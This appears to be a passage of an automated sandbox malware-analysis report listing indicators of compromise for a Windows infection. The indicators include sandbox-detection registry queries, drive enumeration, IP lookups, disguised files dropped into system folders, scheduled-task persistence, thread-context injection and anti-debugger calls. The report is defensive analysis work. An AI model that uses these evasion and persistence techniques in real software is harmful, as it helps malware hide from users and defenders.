description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 3379467.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2lzrdpLz3EwEV8Dc9XpMntEo.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA emBhBCB9JrvjwUss_kimXWYl.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA wwi.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4140297.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 5730.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sihost64.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA hnLz9ujGWUUQxBJp7pt3qDvv.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA F26HMOE0VyruSatwyckTLw9O.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 985091.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7E47t5OZ9Y2AslGLa71zs0Ko.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md8_8eus.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 1305362.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 1612556.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7165322.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 1AF1.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8397358.scr -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\R: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\Z: Install.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\U: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com 1 ipinfo.io 21 ipinfo.io 83 ipinfo.io 124 ipinfo.io -
Drops file in System32 directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\System32\rmclient\msiexec.exe DriverRealtekHDmaster.exe File created C:\Windows\System32\rmclient\133006b48fb54b65ec2045921283a18304e24d5a DriverRealtekHDmaster.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 17 IoCs
pid Process 5956 sihost64.exe 5760 3379467.scr 5284 7E47t5OZ9Y2AslGLa71zs0Ko.exe 6152 hnLz9ujGWUUQxBJp7pt3qDvv.exe 5240 2lzrdpLz3EwEV8Dc9XpMntEo.exe 5704 F26HMOE0VyruSatwyckTLw9O.exe 5488 emBhBCB9JrvjwUss_kimXWYl.exe 6792 8397358.scr 6240 wwi.exe 6976 985091.exe 3824 1305362.exe 3220 4140297.exe 1272 Conhost.exe 3248 1612556.scr 4924 7165322.scr 1268 5730.exe 8080 1AF1.exe -
Suspicious use of SetThreadContext 8 IoCs
description pid Process procid_target PID 5388 set thread context of 2424 5388 ultramediaburner.exe 180 PID 6160 set thread context of 1300 6160 B6srqwApy9H9mq1fCjmNFEFo.exe 199 PID 6004 set thread context of 1896 6004 svchost.exe 190 PID 5364 set thread context of 7320 5364 824.exe 279 PID 3952 set thread context of 8176 3952 schtasks.exe 291 PID 4632 set thread context of 7460 4632 services64.exe 293 PID 1912 set thread context of 2988 1912 6DF8.exe 381 PID 6312 set thread context of 5508 6312 46C6.exe 422 -
Drops file in Program Files directory 32 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\d.jfm md8_8eus.exe File created C:\Program Files\Windows Photo Viewer\ZDDMHZDMRU\ultramediaburner.exe Ze2ro.exe File created C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe 4140297.exe File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat Conhost.exe File created C:\Program Files (x86)\UltraMediaBurner\is-QOFU8.tmp ultramediaburner.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\inst001.exe VDKr3kJPXY5MiEh2sgBh3rKq.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini VDKr3kJPXY5MiEh2sgBh3rKq.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d.INTEG.RAW md8_8eus.exe File created C:\Program Files (x86)\Company\NewProduct\tmp.edb md8_8eus.exe File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe 4140297.exe File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\winlogon.exe DriverRealtekHDmaster.exe File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exe DriverRealtekHDmaster.exe File created C:\Program Files\Windows NT\Accessories\timeout.exe DriverRealtekHDmaster.exe File created C:\Program Files (x86)\Company\NewProduct\d md8_8eus.exe File created C:\Program Files\Windows Photo Viewer\ZDDMHZDMRU\ultramediaburner.exe.config Ze2ro.exe File created C:\Program Files (x86)\WindowsPowerShell\Xaerehacala.exe.config Ze2ro.exe File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exe DriverRealtekHDmaster.exe File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\cc11b995f2a76da408ea6a601e682e64743153ad DriverRealtekHDmaster.exe File created C:\Program Files (x86)\Company\NewProduct\d.jfm md8_8eus.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe VDKr3kJPXY5MiEh2sgBh3rKq.exe File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe ultramediaburner.tmp File created C:\Program Files (x86)\UltraMediaBurner\is-ALGMO.tmp ultramediaburner.tmp File created C:\Program Files\Windows NT\Accessories\22381bee9c04b1a0f29757f8d26c2761032d6137 DriverRealtekHDmaster.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\cm3.exe VDKr3kJPXY5MiEh2sgBh3rKq.exe File created C:\Program Files (x86)\FarLabUninstaller\is-9PTIC.tmp Conhost.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe VDKr3kJPXY5MiEh2sgBh3rKq.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d md8_8eus.exe File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\5b884080fd4f94e2695da25c503f9e33b9605b83 DriverRealtekHDmaster.exe File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat Conhost.exe File created C:\Program Files (x86)\WindowsPowerShell\Xaerehacala.exe Ze2ro.exe -
Drops file in Windows directory 28 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSI25ED.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1F72.tmp msiexec.exe File created C:\Windows\SystemTemp\~DFB02C3D9DC787FD34.TMP msiexec.exe File created C:\Windows\SystemTemp\~DF963E5809070833BA.TMP msiexec.exe File created C:\Windows\SystemTemp\~DF5CEFC7CC3412DD07.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI1BF6.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI44B3.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\SystemTemp\~DFBB9D7EB406EBA765.TMP msiexec.exe File created C:\Windows\Tasks\AdvancedWindowsManager #1.job MsiExec.exe File opened for modification C:\Windows\Installer\MSI883A.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8A4F.tmp msiexec.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File created C:\Windows\Installer\3102e.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI2280.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File opened for modification C:\Windows\Installer\3102e.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI23F8.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI3FFF.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI488C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI76E4.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI160A.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI287E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4E2B.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI54D3.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI55DE.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 23 IoCs
pid pid_target Process procid_target 6056 4748 WerFault.exe 104 6048 4660 WerFault.exe 106 3872 5152 WerFault.exe 109 6576 1312 WerFault.exe 89 6880 5880 WerFault.exe 128 7080 5656 WerFault.exe 127 1428 6784 WerFault.exe 154 1104 5564 WerFault.exe 136 6556 4896 WerFault.exe 131 5256 6460 WerFault.exe 161 2896 2156 WerFault.exe 137 984 6180 WerFault.exe 236 6020 1152 WerFault.exe 233 5968 6220 WerFault.exe 232 6992 6132 WerFault.exe 206 7848 7364 WerFault.exe 277 7796 3988 WerFault.exe 309 7076 2068 WerFault.exe 314 1992 4848 WerFault.exe 330 7796 6360 WerFault.exe 338 7448 3052 WerFault.exe 341 7244 1132 WerFault.exe 360 1584 1852 WerFault.exe 373 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI B6srqwApy9H9mq1fCjmNFEFo.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI B6srqwApy9H9mq1fCjmNFEFo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 824.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 824.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 824.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI B6srqwApy9H9mq1fCjmNFEFo.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WMIC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier CompPkgSrv.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe -
Creates scheduled task(s) 1 TTPs 19 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3952 schtasks.exe 7360 schtasks.exe 5332 schtasks.exe 7444 schtasks.exe 3140 schtasks.exe 5456 schtasks.exe 6296 schtasks.exe 5276 schtasks.exe 2940 schtasks.exe 4132 schtasks.exe 5196 schtasks.exe 6504 schtasks.exe 2160 schtasks.exe 4356 schtasks.exe 7992 schtasks.exe 5028 schtasks.exe 5420 schtasks.exe 4376 schtasks.exe 5004 schtasks.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 5312 timeout.exe 1172 timeout.exe -
Enumerates system info in registry 2 TTPs 49 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Process not Found Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Process not Found Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS CompPkgSrv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Process not Found Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WMIC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WMIC.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU CompPkgSrv.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe -
Kills process with taskkill 1 IoCs
pid Process 3968 taskkill.exe -
Modifies data under HKEY_USERS 46 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\7 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs 